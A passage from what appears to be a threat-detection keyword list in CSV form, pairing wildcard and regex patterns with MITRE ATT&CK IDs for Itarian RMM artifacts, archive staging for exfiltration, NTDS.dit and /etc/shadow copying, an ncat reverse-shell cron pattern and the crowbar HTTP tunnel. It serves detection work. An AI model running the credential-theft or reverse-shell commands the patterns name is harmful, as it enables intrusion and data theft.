manager\itsmagent.exe*",".{0,1000}\\itarian\\endpoint\smanager\\itsmagent\.exe.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\itarian\endpoint manager\itsmservice.exe*",".{0,1000}\\itarian\\endpoint\smanager\\itsmservice\.exe.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\itarian\endpoint 
manager\rhost.exe*",".{0,1000}\\itarian\\endpoint\smanager\\rhost\.exe.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ITarian\RemoteControl*",".{0,1000}\\ITarian\\RemoteControl.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ITarian_Remote_Access_*.log*",".{0,1000}\\ITarian_Remote_Access_.{0,1000}\.log.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ITarianRemoteAccess.exe*",".{0,1000}\\ITarianRemoteAccess\.exe.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Program Files (x86)\ITarian\Endpoint Manager\*",".{0,1000}\\Program\sFiles\s\(x86\)\\ITarian\\Endpoint\sManager\\.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools 
includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Program Files (x86)\ITarian\RemoteControl\*",".{0,1000}\\Program\sFiles\s\(x86\)\\ITarian\\RemoteControl\\.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Remote_Control_by_ITarian_*.log*",".{0,1000}\\Remote_Control_by_ITarian_.{0,1000}\.log.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\remotecontrol\rcontrol.exe*",".{0,1000}\\remotecontrol\\rcontrol\.exe.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\remotecontrol\rviewer.exe*",".{0,1000}\\remotecontrol\\rviewer\.exe.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemoteControlbyITarian (3).exe*",".{0,1000}\\RemoteControlbyITarian\s\(3\)\.exe.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemoteControlbyITarian_(3).exe*",".{0,1000}\\RemoteControlbyITarian_\(3\)\.exe.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemoteControlSetup.exe*",".{0,1000}\\RemoteControlSetup\.exe.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RmmService.exe*",".{0,1000}\\RmmService\.exe.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*\SOFTWARE\ITarian\RemoteControl*",".{0,1000}\\SOFTWARE\\ITarian\\RemoteControl.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","#registry","N/A","10","10","N/A","N/A","N/A","N/A" "*\SOFTWARE\WOW6432Node\ITarian\ITSM\*",".{0,1000}\\SOFTWARE\\WOW6432Node\\ITarian\\ITSM\\.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","#registry","N/A","10","10","N/A","N/A","N/A","N/A" "*>Remote Control by Itarian<*",".{0,1000}\>Remote\sControl\sby\sItarian\<.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*>RmmService<*",".{0,1000}\>RmmService\<.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","#servicename","N/A","10","10","N/A","N/A","N/A","N/A" "*cwn-log-collector-production-clone.*.elasticbeanstalk.com*",".{0,1000}cwn\-log\-collector\-production\-clone\..{0,1000}\.elasticbeanstalk\.com.{0,1000}","greyware_tool_keyword","ComodoRMM 
(Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ITarianRemoteAccessSetup.exe*",".{0,1000}ITarianRemoteAccessSetup\.exe.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Linux ITSM Agent/* -e /tmp/install.sh *",".{0,1000}Linux\sITSM\sAgent\/.{0,1000}\s\-e\s\/tmp\/install\.sh\s.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*mdmsupport.comodo.com*",".{0,1000}mdmsupport\.comodo\.com.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*:\programdata\cloud.exe*",".{0,1000}\:\\programdata\\cloud\.exe.{0,1000}","greyware_tool_keyword","Compress-Archive","Compress data using zlib for exfiltration","T1560 - T1020 - T1041","TA0010","N/A","N/A","Data 
Exfiltration","https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a","1","0","N/A","https://x.com/malmoeb/status/1736995855482118314","10","10","N/A","N/A","N/A","N/A" "*Compress-Archive -Path*-DestinationPath $env:TEMP*",".{0,1000}Compress\-Archive\s\-Path.{0,1000}\-DestinationPath\s\$env\:TEMP.{0,1000}","greyware_tool_keyword","Compress-Archive","Compress data using zlib for exfiltration","T1560 - T1020 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Compress-Archive -Path*-DestinationPath*:\Windows\Temp\*",".{0,1000}Compress\-Archive\s\-Path.{0,1000}\-DestinationPath.{0,1000}\:\\Windows\\Temp\\.{0,1000}","greyware_tool_keyword","Compress-Archive","Compress data using zlib for exfiltration","T1560 - T1020 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Compress-Archive -Path*-DestinationPath*\AppData\Local\Temp\'*",".{0,1000}Compress\-Archive\s\-Path.{0,1000}\-DestinationPath.{0,1000}\\AppData\\Local\\Temp\\\'.{0,1000}","greyware_tool_keyword","Compress-Archive","Compress data using zlib for exfiltration","T1560 - T1020 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*conhost.exe * --headless*",".{0,1000}conhost\.exe\s.{0,1000}\s\-\-headless.{0,1000}","greyware_tool_keyword","conhost.exe","conhost in headless mode - no visible window will pop up on the victim machine","T1055 - T1562.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://x.com/TheDFIRReport/status/1721521617908473907?s=20","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A" "*copy *.exe 
\\*\c$\Windows\*.exe*",".{0,1000}copy\s.{0,1000}\.exe\s\\\\.{0,1000}\\c\$\\Windows\\.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","copy","copying an executable to a remote machine in the c:\windows directory","T1021","TA0008","N/A","N/A","Lateral Movement","https://x.com/ACEResponder/status/1720906842631549377","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*copy *\NTDS\ntds.dit *\Temp\*.*",".{0,1000}copy\s.{0,1000}\\NTDS\\ntds\.dit\s.{0,1000}\\Temp\\.{0,1000}\..{0,1000}","greyware_tool_keyword","copy","the actor creating a Shadow Copy and then extracting a copy of the ntds.dit file from it.","T1003.001 - T1567.001 - T1070.004","TA0005 - TA0003 - TA0007","N/A","Volt Typhoon","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*copy *NTDS\NTDS.dit*Temp*",".{0,1000}copy\s.{0,1000}NTDS\\NTDS\.dit.{0,1000}Temp.{0,1000}","greyware_tool_keyword","copy","copy the NTDS.dit file from a Volume Shadow Copy which contains sensitive Active Directory data including password hashes for all domain users","T1003.003","TA0009","N/A","N/A","Collection","N/A","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*cp /etc/passwd*",".{0,1000}cp\s\/etc\/passwd.{0,1000}","greyware_tool_keyword","cp","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*cp /etc/shadow*",".{0,1000}cp\s\/etc\/shadow.{0,1000}","greyware_tool_keyword","cp","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - 
T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*cp -i /bin/sh */crond*",".{0,1000}cp\s\-i\s\/bin\/sh\s.{0,1000}\/crond.{0,1000}","greyware_tool_keyword","crond","Masquerading as Linux Crond Process. Masquerading occurs when the name or location of an executable - legitimate or malicious - is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.","T1036 - T1564.003 - T1059.004","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/auditd/lnx_auditd_masquerading_crond.yml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","8034","2149","2024-08-29T18:41:50Z","2016-12-24T09:48:49Z" "*crontab* sleep *ncat * -e /bin/bash*crontab*",".{0,1000}crontab.{0,1000}\ssleep\s.{0,1000}ncat\s.{0,1000}\s\-e\s\/bin\/bash.{0,1000}crontab.{0,1000}","greyware_tool_keyword","crontab","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Persistence","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*/crowbar.git*",".{0,1000}\/crowbar\.git.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","1","N/A","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z" 
"*/crowbar_1.0.0_darwin_386.zip*",".{0,1000}\/crowbar_1\.0\.0_darwin_386\.zip.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","1","N/A","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z" "*/crowbar_1.0.0_darwin_amd64.zip*",".{0,1000}\/crowbar_1\.0\.0_darwin_amd64\.zip.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","1","N/A","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z" "*/crowbar_1.0.0_freebsd_386.zip*",".{0,1000}\/crowbar_1\.0\.0_freebsd_386\.zip.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","1","N/A","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z" "*/crowbar_1.0.0_freebsd_amd64.zip*",".{0,1000}\/crowbar_1\.0\.0_freebsd_amd64\.zip.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","1","N/A","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z" "*/crowbar_1.0.0_freebsd_arm.zip*",".{0,1000}\/crowbar_1\.0\.0_freebsd_arm\.zip.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","1","N/A","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z" "*/crowbar_1.0.0_linux_386.tar.gz*",".{0,1000}\/crowbar_1\.0\.0_linux_386\.tar\.gz.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - 
TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","1","N/A","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z" "*/crowbar_1.0.0_linux_amd64.tar.gz*",".{0,1000}\/crowbar_1\.0\.0_linux_amd64\.tar\.gz.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","1","N/A","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z" "*/crowbar_1.0.0_linux_arm.tar.gz*",".{0,1000}\/crowbar_1\.0\.0_linux_arm\.tar\.gz.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","1","N/A","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z" "*/crowbar_1.0.0_openbsd_386.zip*",".{0,1000}\/crowbar_1\.0\.0_openbsd_386\.zip.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","1","N/A","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z" "*/crowbar_1.0.0_openbsd_amd64.zip*",".{0,1000}\/crowbar_1\.0\.0_openbsd_amd64\.zip.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","1","N/A","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z" "*/crowbar_1.0.0_windows_386.zip*",".{0,1000}\/crowbar_1\.0\.0_windows_386\.zip.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","1","N/A","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z" 
"*/crowbar_1.0.0_windows_amd64.zip*",".{0,1000}\/crowbar_1\.0\.0_windows_amd64\.zip.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","1","N/A","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z" "*/etc/crowbar/*",".{0,1000}\/etc\/crowbar\/.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","0","N/A","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z" "*/etc/crowbard.conf*",".{0,1000}\/etc\/crowbard\.conf.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","0","N/A","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z" "*47e4818c3db3471c950cdb4c4732232bafc584997098c92ada8a0f720e2ad448*",".{0,1000}47e4818c3db3471c950cdb4c4732232bafc584997098c92ada8a0f720e2ad448.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","0","#filehash","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z" "*4ba042e8f3a3f5cf7e01e64461d27f5733c505b8a0f221fb91ed44e93627cd91*",".{0,1000}4ba042e8f3a3f5cf7e01e64461d27f5733c505b8a0f221fb91ed44e93627cd91.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","0","#filehash","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z" "*4df132ced0bbdbe4965bea528bb11385426a938fcdec3a2905b92d800c9c8fba*",".{0,1000}4df132ced0bbdbe4965bea528bb11385426a938fcdec3a2905b92d800c9c8fba.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP 
over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","0","#filehash","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z" "*515983df3a9aad4aae1e5e37cdf489686b4d7daed5610a75d75ebba006c4ddc9*",".{0,1000}515983df3a9aad4aae1e5e37cdf489686b4d7daed5610a75d75ebba006c4ddc9.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","0","#filehash","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z" "*602b348fd6e3407423330d761b04dfdcd8094e552c1184db100c07058343f8d4*",".{0,1000}602b348fd6e3407423330d761b04dfdcd8094e552c1184db100c07058343f8d4.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","0","#filehash","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z" "*6510e91b5511a68222bade46531b5d70850559b7da4dadd2fb187015cc811efa*",".{0,1000}6510e91b5511a68222bade46531b5d70850559b7da4dadd2fb187015cc811efa.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","0","#filehash","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z" "*8c39d2ef5bd7cb5c7aae4c5094f50cbd39b2a6c3fe65a049c91f7943f679d6b9*",".{0,1000}8c39d2ef5bd7cb5c7aae4c5094f50cbd39b2a6c3fe65a049c91f7943f679d6b9.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","0","#filehash","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z" 
"*91bc0b2cabb6618b228003f1f7f4467b1867eae3c3f42081ee8c4e30e937e77e*",".{0,1000}91bc0b2cabb6618b228003f1f7f4467b1867eae3c3f42081ee8c4e30e937e77e.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","0","#filehash","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z" "*9bfd1f0cb077ba95935c260cf66554142867486a42c8d84920e09dd3c6117ed1*",".{0,1000}9bfd1f0cb077ba95935c260cf66554142867486a42c8d84920e09dd3c6117ed1.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","0","#filehash","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z" "*b4bed3b73a07c019ea853ee051e35932c97a1547809697dfa495a00710dec8eb*",".{0,1000}b4bed3b73a07c019ea853ee051e35932c97a1547809697dfa495a00710dec8eb.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","0","#filehash","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z" "*chown crowbar:crowbar *",".{0,1000}chown\scrowbar\:crowbar\s.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","0","N/A","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z" "*cmd/crowbard/*",".{0,1000}cmd\/crowbard\/.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","1","N/A","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z" "*crowbar-forward -local=*",".{0,1000}crowbar\-forward\s\-local\=.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over 
a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","0","N/A","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z" "*e4d2ed3af31f30f40f83a73dd6c4dcce275ae8cc85d52c7f30a51bfdb7ebeec2*",".{0,1000}e4d2ed3af31f30f40f83a73dd6c4dcce275ae8cc85d52c7f30a51bfdb7ebeec2.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","0","#filehash","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z" "*eb459c0af8c8d7bb91f7c6acc4682f1b2a6add840925bc8a9321c5cc1e2a8137*",".{0,1000}eb459c0af8c8d7bb91f7c6acc4682f1b2a6add840925bc8a9321c5cc1e2a8137.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","0","#filehash","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z" "*f154878288857410353e4cabc498941869ffbbd1783f6a1923c6ed92c03dfab6*",".{0,1000}f154878288857410353e4cabc498941869ffbbd1783f6a1923c6ed92c03dfab6.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - 